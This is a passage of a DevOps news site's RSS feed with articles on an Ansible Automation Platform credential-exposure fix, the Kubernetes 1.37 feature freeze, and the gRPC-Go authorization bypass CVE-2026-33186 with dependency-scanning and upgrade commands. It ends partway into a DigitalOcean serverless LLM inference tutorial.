            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You are exposed if you run <strong>Ansible Automation Platform 2.5 or 2.6</strong> with Event-Driven Ansible. The dangerous shape is the common one: an AAP instance that more than a handful of people can log into, where those people are not all equally trusted with every credential the platform holds. That describes most real installations, because the whole value of a shared automation platform is that teams share it.</p>
<p>The attacker does not need to be an outsider. The bug turns any authenticated account, a contractor, a junior engineer, a service account with a leaked token, into a path to the keys for your entire managed estate.</p>
<h2 id="h2-fixing-it" class="group relative scroll-mt-24">
        <a href="#h2-fixing-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fixing it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-fixing-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Red Hat has shipped patches. Update to the fixed releases:</p>
<ul>
<li><strong>AAP 2.5</strong>: apply the update from advisory <strong>RHSA-2026:28497</strong>.</li>
<li><strong>AAP 2.6</strong>: apply the update from advisory <strong>RHSA-2026:28492</strong>.</li>
</ul>
<p>Patching closes the hole, but with a credential-exposure bug you should assume the worst about the window before you patched. If your AAP was reachable by anyone you would not hand your root SSH keys to, treat the exposed credentials as potentially compromised:</p>
<ol>
<li><strong>Patch first</strong>, on both the controller and any EDA components.</li>
<li><strong>Rotate the secrets the platform held</strong>: SSH keys, vault passwords, OAuth tokens, anything stored as an AAP credential. This is the step teams skip and the one that actually closes the incident, because the patch stops future leaks but does nothing about credentials that may already be out.</li>
<li><strong>Review who can authenticate to AAP at all</strong>, and prune it. The blast radius of this bug was set by your login list.</li>
</ol>
<h2 id="h2-the-broader-point-automation-platforms-are-credential-honeypots" class="group relative scroll-mt-24">
        <a href="#h2-the-broader-point-automation-platforms-are-credential-honeypots" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The broader point: automation platforms are credential honeypots
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-broader-point-automation-platforms-are-credential-honeypots"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Strip away the specifics and CVE-2026-11807 is a lesson about a category, not a product. Your automation control plane is, by design, the place where the most powerful credentials in your organization are concentrated. AAP holds the keys to the fleet. A CI/CD runner holds deploy keys, registry tokens, and cloud credentials. A low-code automation tool like n8n holds the API keys to every service it touches. These systems earn their value by being trusted with everything, which is exactly what makes a single authorization slip in one of them catastrophic.</p>
<p>That reframes how you should treat them:</p>
<ul>
<li><strong>Least privilege on who can log in, not just on what they can do.</strong> This bug bypassed the &quot;what they can do&quot; layer entirely. The only control that held was &quot;who is in the door,&quot; so make that list short and reviewed.</li>
<li><strong>Segment the credential store.</strong> If one platform holds the keys to production, staging, and every cloud account, one bug owns all three. Separate credentials by blast radius so a single platform compromise is not a total one.</li>
<li><strong>Plan for rotation before you need it.</strong> The teams who patch this fast and shrug are the ones who can rotate every AAP-held secret with a script. If rotating your automation credentials is a manual, scary, all-day job, that is a finding in itself.</li>
<li><strong>Watch the advisories for the tools that hold your keys,</strong> not just the apps you write. The software most worth patching urgently is the software trusted with the most, and that is usually your automation and CI platforms, not your web app.</li>
</ul>
<p>Patch CVE-2026-11807 today if you run AAP. Then sit with the uncomfortable question it raises: if any logged-in user could have walked out with your SSH keys this week, what does that say about how much trust is concentrated in one place, and how quickly you could rotate your way out of it?</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Kubernetes 1.37 Just Locked Its Feature Set: What Made the Cut]]></title>
      <link>https://devops-daily.com/posts/kubernetes-1-37-feature-freeze-whats-locked-in</link>
      <description><![CDATA[The enhancements freeze for Kubernetes 1.37 landed on June 17, so the shape of the August release is now decided. GPU partitioning keeps maturing for AI workloads, and a cgroup v1 change will stop some kubelets from starting. Here is what is locked in and what to check before you upgrade.]]></description>
      <pubDate>Wed, 24 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/kubernetes-1-37-feature-freeze-whats-locked-in</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[kubernetes]]></category><category><![CDATA[cloud-native]]></category><category><![CDATA[dra]]></category><category><![CDATA[gpu]]></category><category><![CDATA[upgrades]]></category>
      <content:encoded><![CDATA[<p>Every Kubernetes release has a moment where the feature set stops being a wish list and becomes a plan. That moment is the enhancements freeze, and for <strong>Kubernetes 1.37 it landed on June 17, 2026</strong>. After it, no new KEP joins the release; the cycle is about landing and stabilizing what already made the cut. The code freeze follows on July 22 to 23, and <strong>1.37 ships on August 26</strong>.</p>
<p>So this is the right time to look at what is coming, while there is still runway to prepare. The headline is continuity rather than fireworks: 1.37 keeps pushing on AI infrastructure, and it carries one cleanup that will stop some nodes from booting if you are not ready. Worth noting up front: until code freeze, graduation levels can still slip, so treat specifics as the current plan, not a signed release note.</p>
<h2 id="h2-the-theme-gpus-you-can-slice" class="group relative scroll-mt-24">
        <a href="#h2-the-theme-gpus-you-can-slice" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The theme: GPUs you can slice
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-theme-gpus-you-can-slice"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The throughline of the last several Kubernetes releases has been Dynamic Resource Allocation (DRA), the framework that lets pods request specialized hardware (GPUs, accelerators, NICs) with far more nuance than the old &quot;give me one GPU&quot; model. DRA core went GA back in 1.34, and each release since has extended it.</p>
<p>In 1.37 the work continues on <strong>partitionable devices</strong> (<a href="https://github.com/kubernetes/enhancements/issues/4815">KEP-4815</a>), which entered alpha in 1.36. The idea is exactly what it sounds like: take one physical GPU and carve it into smaller logical slices that schedule independently to different pods. For AI and ML teams this is the feature that matters, because a single modern accelerator is often far bigger than one inference workload needs, and bin-packing several tenants onto one card is the difference between a GPU that pays for itself and one that idles. This is the same economic pressure behind the memory and accelerator crunch we wrote about in <a href="https://devops-daily.com/posts/hetzner-doubled-prices-ai-memory-crunch">the Hetzner price piece</a>: when the hardware is scarce and expensive, the platform that lets you subdivide it wins.</p>
<p>If you run GPU workloads on Kubernetes, partitionable devices is the 1.37 line item to read the KEP on and test in a non-production cluster, because it changes how you model capacity.</p>
<h2 id="h2-the-change-that-can-stop-kubelet-from-starting" class="group relative scroll-mt-24">
        <a href="#h2-the-change-that-can-stop-kubelet-from-starting" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The change that can stop kubelet from starting
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-change-that-can-stop-kubelet-from-starting"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the one that belongs on your upgrade checklist rather than your &quot;nice to have&quot; list. <strong>Kubernetes 1.37 tightens the cgroup v1 retirement.</strong> If you are still running cgroup v1 nodes and have not set <code>failCgroupV1: false</code>, the kubelet will refuse to start on 1.37. The kubelet now relies entirely on detecting the cgroup driver from the container runtime (the <code>KubeletCgroupDriverFromCRI</code> behavior that went GA in 1.36), with the legacy manual driver flags removed.</p>
<p>In plain terms: a node that came up fine on 1.36 can fail to come up on 1.37 if it is still on cgroup v1. Most modern distributions moved to cgroup v2 a while ago, but if you run older base images, custom node images, or long-lived on-prem hosts, check this before you roll the upgrade, not during it. The same release also completes the removal of <strong>containerd 1.x support</strong>: 1.37 expects containerd 2.0 or later.</p>
<p>Neither of these is a surprise, both have been telegraphed for several releases, but &quot;telegraphed&quot; and &quot;handled in your fleet&quot; are different things, and this is the release where the warnings turn into hard failures.</p>
<h2 id="h2-the-rest-of-the-shape" class="group relative scroll-mt-24">
        <a href="#h2-the-rest-of-the-shape" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The rest of the shape
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-rest-of-the-shape"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Beyond those two, 1.37 reads as a consolidation release. DRA is the marquee work, the cgroup and containerd removals are the operational edges, and a long tail of smaller enhancements continues maturing features that went beta in 1.36 (such as the WebSocket-to-kubelet streaming work). For scale, 1.36 shipped 70 enhancements split across stable, beta, and alpha, and 1.37 continues directly from that base; the exact stable-versus-beta split for 1.37 firms up at code freeze in late July.</p>
<p>That &quot;consolidation&quot; framing is not a criticism. After several releases of aggressive AI-driven change, a cycle spent hardening DRA and finishing long-deprecated removals is exactly what operators want. The exciting releases make headlines; the consolidation releases are the ones that let you sleep.</p>
<h2 id="h2-what-to-do-now" class="group relative scroll-mt-24">
        <a href="#h2-what-to-do-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to do now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-do-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ol>
<li><strong>Audit your nodes for cgroup v1 before August.</strong> This is the change most likely to bite. Confirm your node images are on cgroup v2, and if any are not, plan the migration or set the flag deliberately rather than discovering it when a node will not register.</li>
<li><strong>Confirm containerd 2.0+ across the fleet.</strong> Pair it with the cgroup check; both are runtime-level and both turn into hard failures here.</li>
<li><strong>If you run GPUs, read <a href="https://github.com/kubernetes/enhancements/issues/4815">KEP-4815</a> and test partitioning in staging.</strong> It is alpha-track, so it is opt-in, but it is the feature most likely to change how you plan capacity in 2026.</li>
<li><strong>Wait for the official release notes before production.</strong> 1.37 is in alpha now (1.37.0-alpha.1 landed June 10) and GA is August 26. Plan now, upgrade when it is stable and your runtime checks pass.</li>
</ol>
<p>The pattern across 2026&#39;s Kubernetes releases has been steady: more for AI hardware, fewer escape hatches for legacy node configuration. 1.37 is squarely in that groove. The upgrade itself should be calm, as long as your nodes are on cgroup v2 and a current containerd before you start.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[The gRPC-Go Auth Bypass Hiding in Your Dependency Tree: CVE-2026-33186]]></title>
      <link>https://devops-daily.com/posts/grpc-go-authorization-bypass-cve-2026-33186</link>
      <description><![CDATA[A missing leading slash lets requests slip past gRPC-Go authorization rules. It is a CVSS 9.1, it is fixed in 1.79.3, and because gRPC-Go is a transitive dependency in a huge slice of cloud-native Go, you may be shipping it without knowing. Here is how to find out.]]></description>
      <pubDate>Wed, 24 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/grpc-go-authorization-bypass-cve-2026-33186</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[security]]></category><category><![CDATA[grpc]]></category><category><![CDATA[golang]]></category><category><![CDATA[cve]]></category><category><![CDATA[supply-chain]]></category>
      <content:encoded><![CDATA[<p>Most authorization bugs are loud: a missing check, an admin route with no guard. CVE-2026-33186 is the quieter kind, the sort that passes code review because the check is right there in the code and looks correct. The flaw is not in your policy. It is in a single character that decides whether your policy is consulted at all.</p>
<p>It is rated <strong>CVSS 9.1 (critical)</strong>, it lives in <code>google.golang.org/grpc</code>, and the reason it matters for you specifically is that gRPC-Go is rarely a dependency you chose on purpose. It rides in transitively under Kubernetes clients, observability agents, service meshes, cloud SDKs, and dozens of other Go modules. You can be exposed without a single line of gRPC in your own code. This post is what the bug is, who it actually affects, and the commands to check your own tree in a couple of minutes.</p>
<h2 id="h2-what-the-bug-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-bug-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>gRPC runs over HTTP/2, and every call carries a <code>:path</code> pseudo-header that names the method, canonically with a leading slash: <code>/myapp.Orders/Cancel</code>.</p>
<p>The vulnerable gRPC-Go server was too forgiving. It also accepted the same path <em>without</em> the leading slash, <code>myapp.Orders/Cancel</code>, and still routed it to the correct handler. On its own that is a harmless bit of leniency. It becomes a security hole the moment authorization runs as an interceptor that matches on the path string, which is exactly how the official <code>grpc/authz</code> package and most hand-rolled interceptors work.</p>
<p>Here is the sequence:</p>
<ol>
<li>A request arrives with <code>:path</code> of <code>myapp.Orders/Cancel</code> (no leading slash).</li>
<li>The authorization interceptor evaluates its rules against that raw string. A deny rule written canonically as <code>/myapp.Orders/Cancel</code> does not match, because <code>myapp.Orders/Cancel</code> is a different string.</li>
<li>If the policy has a permissive fallback (a catch-all &quot;allow&quot; when nothing else matched, a common shape), the request is allowed.</li>
<li>The router, being lenient, sends it to the real <code>Cancel</code> handler anyway.</li>
</ol>
<p>The deny rule was correct. It just never got a chance to fire, because the string it was asked about was not the string it was written for. This is a textbook canonicalization bug (CWE-285, improper authorization), and its blast radius is &quot;authorization, silently skipped.&quot;</p>
<p>The CVSS vector tells the story: network attackable, no privileges, no user interaction, high confidentiality and integrity impact. The one piece of good news is no availability impact, this leaks and mutates, it does not crash.</p>
<h2 id="h2-who-is-actually-affected" class="group relative scroll-mt-24">
        <a href="#h2-who-is-actually-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who is actually affected
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-who-is-actually-affected"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Not every gRPC-Go server. You are exposed if all of these hold:</p>
<ul>
<li>You run a gRPC-Go <strong>server</strong> on a version <strong>before 1.79.3</strong>.</li>
<li>You enforce authorization in an <strong>interceptor that keys on the method path</strong>, either <code>google.golang.org/grpc/authz</code> or a custom interceptor that reads <code>info.FullMethod</code>.</li>
<li>Your policy relies on <strong>deny rules with a permissive fallback</strong>, rather than default-deny with explicit allows.</li>
</ul>
<p>If your authorization is default-deny (nothing is allowed unless a rule explicitly permits it), the non-canonical path fails to match your <em>allow</em> rules too, so the request is rejected and you are not exploitable through this path. That is worth sitting with: the teams hit hardest here are the ones using blocklist-style policies, and the teams who modelled authorization as a strict allowlist mostly dodged it. Default-deny earns its keep again.</p>
<h2 id="h2-find-it-in-your-own-tree" class="group relative scroll-mt-24">
        <a href="#h2-find-it-in-your-own-tree" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Find it in your own tree
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-find-it-in-your-own-tree"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The hard part is not fixing this, it is discovering that you ship it at all, since it is almost always transitive. Three checks, fastest first.</p>
<p>List every version of gRPC-Go anywhere in your module graph:</p>
<pre><code class="hljs language-bash">go list -m all | grep google.golang.org/grpc
</code></pre><p>If anything there is below <code>1.79.3</code>, keep going. To see <em>why</em> it is in your build (which of your direct dependencies drags it in), ask:</p>
<pre><code class="hljs language-bash">go mod why -m google.golang.org/grpc
</code></pre><p>That prints the import chain, which tells you whether you can bump it directly or need to wait on (or prod) an upstream dependency to update.</p>
<p>Best of all, let the official vulnerability scanner connect the CVE to your actual code paths:</p>
<pre><code class="hljs language-bash">go install golang.org/x/vuln/cmd/govulncheck@latest
govulncheck ./...
</code></pre><p><code>govulncheck</code> is the one to trust, because it does call-graph analysis: it reports the vulnerability as actually reachable only if your binary really calls the affected code, which cuts the noise of &quot;it is in the tree but never executed.&quot; For a CI gate, it is a clean addition.</p>
<h2 id="h2-fixing-it" class="group relative scroll-mt-24">
        <a href="#h2-fixing-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fixing it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-fixing-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The direct fix is to move gRPC-Go to <strong>1.79.3 or later</strong>:</p>
<pre><code class="hljs language-bash">go get google.golang.org/grpc@v1.79.3
go mod tidy
</code></pre><p>The patch makes the server reject any <code>:path</code> without a leading slash, returning <code>codes.Unimplemented</code> instead of quietly routing it. If the vulnerable version is transitive and the dependency that pulls it in has not updated yet, a temporary <code>replace</code> directive or a Go module <code>exclude</code> can hold the line until upstream catches up, though a direct <code>require</code> bump is cleaner where the graph allows it.</p>
<p>There is also a defense-in-depth lesson worth banking regardless of this CVE: authorization that matches on a raw, externally-supplied string is fragile. Canonicalize the input before you evaluate policy against it, prefer default-deny over deny-with-fallback, and treat the path in an interceptor as untrusted until normalized. Those habits would have made this specific bug a non-event.</p>
<h2 id="h2-the-bigger-picture" class="group relative scroll-mt-24">
        <a href="#h2-the-bigger-picture" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The bigger picture
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-bigger-picture"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The uncomfortable part of CVE-2026-33186 is not the bug, which is small and now fixed. It is how many teams will read the headline, think &quot;we do not use gRPC,&quot; and move on, while a 9.1 sits three levels deep in their dependency graph under a Kubernetes client or a telemetry agent. Modern Go services pull in hundreds of modules; the ones that bite are rarely the ones you typed <code>go get</code> for.</p>
<p>So the takeaway is a habit, not a patch. Run <code>govulncheck ./...</code> in CI so a critical in a transitive dependency shows up as a failed build, not a blog post you skim eight months later. The leading slash is fixed. The next canonicalization bug in something you did not know you depended on is only a matter of time, and the audit that catches it takes about as long as reading this did.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Your First Serverless LLM Call on DigitalOcean in 10 Minutes]]></title>
      <link>https://devops-daily.com/posts/digitalocean-serverless-inference-first-call</link>
      <description><![CDATA[DigitalOcean's Inference Engine gives you an OpenAI-compatible endpoint with pay-per-token pricing and no GPU to manage. Here is the fastest path from zero to a working call, with curl, Python, and Node, every snippet run against the live API.]]></description>
      <pubDate>Mon, 22 Jun 2026 14:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/digitalocean-serverless-inference-first-call</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[digitalocean]]></category><category><![CDATA[llm]]></category><category><![CDATA[inference]]></category><category><![CDATA[tutorial]]></category>
      <content:encoded><![CDATA[<p>Most &quot;get started with AI&quot; guides assume you want to stand up a GPU, pick a serving framework, and babysit it. For a lot of real work you do not. You want to send a prompt and get a completion back, pay for the tokens you used, and move on. That is what DigitalOcean&#39;s <strong>Inference Engine</strong> (part of its AI-Native Cloud) gives you: an OpenAI-compatible endpoint, a catalog of hosted models, pay-per-token billing, and no GPU to provision or scale.</p>
<p>Because the API speaks the OpenAI dialect, the practical version of &quot;getting started&quot; is mostly changing a base URL. This post takes you from nothing to a working call in about ten minutes, with curl, the OpenAI Python SDK, and the OpenAI Node SDK. Every snippet here was run against the live endpoint, so the responses and token counts you see are real.</p>
<h2 id="h2-what-you-need" class="group relative scroll-mt-24">
        <a href="#h2-what-you-need" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What you need
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-you-need"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A DigitalOcean account.</li>
<li>A couple of minutes to create a model access key.</li>
<li>curl, or Python 3, or Node, depending on which example you follow.</li>
</ul>
<p>That is the whole list. There is no GPU Droplet to create for this; serverless inference pools GPU capacity behind the endpoint and you pay only for tokens.</p>
<h2 id="h2-step-1-create-a-model-access-key" class="group relative scroll-mt-24">
        <a href="#h2-step-1-create-a-model-access-key" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: Create a model access key
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-1-create-a-model-access-key"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>In the DigitalOcean Control Panel, open the AI / Inference area and go to <strong>Model Access Keys</strong>, then <strong>Create model access key</strong>. Give it a name, and choose <strong>All models</strong> so the key can call any model in the catalog (you can scope a key to specific models later for production).</p>
<p>One setting is worth understanding before you click create: a model access key can be <strong>bound to a VPC</strong>. A VPC-scoped key only works for requests that originate from inside that DigitalOcean private network, which is exactly what you want in production (a leaked key is useless from the public internet). For this walkthrough, where you are calling from your laptop, leave the VPC restriction off, or you will get a <code>403 Forbidden</code> no matter how correct the rest of your request is. More on that in the troubleshooting note at the end.</p>
<p>Copy the key when it is shown and keep it somewhere safe. Then put it in your shell so the examples can read it:</p>
<pre><code class="hljs language-bash"><span class="hljs-built_in">export</span> DO_INFERENCE_KEY=<span class="hljs-string">&quot;paste-your-key-here&quot;</span>
</code></pre><p>Treat this like any other secret: environment variable or secrets manager, never committed to a repo or pasted into frontend code.</p>
<h2 id="h2-step-2-your-first-call-with-curl" class="group relative scroll-mt-24">
        <a href="#h2-step-2-your-first-call-with-curl" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: Your first call with curl
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-2-your-first-call-with-curl"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
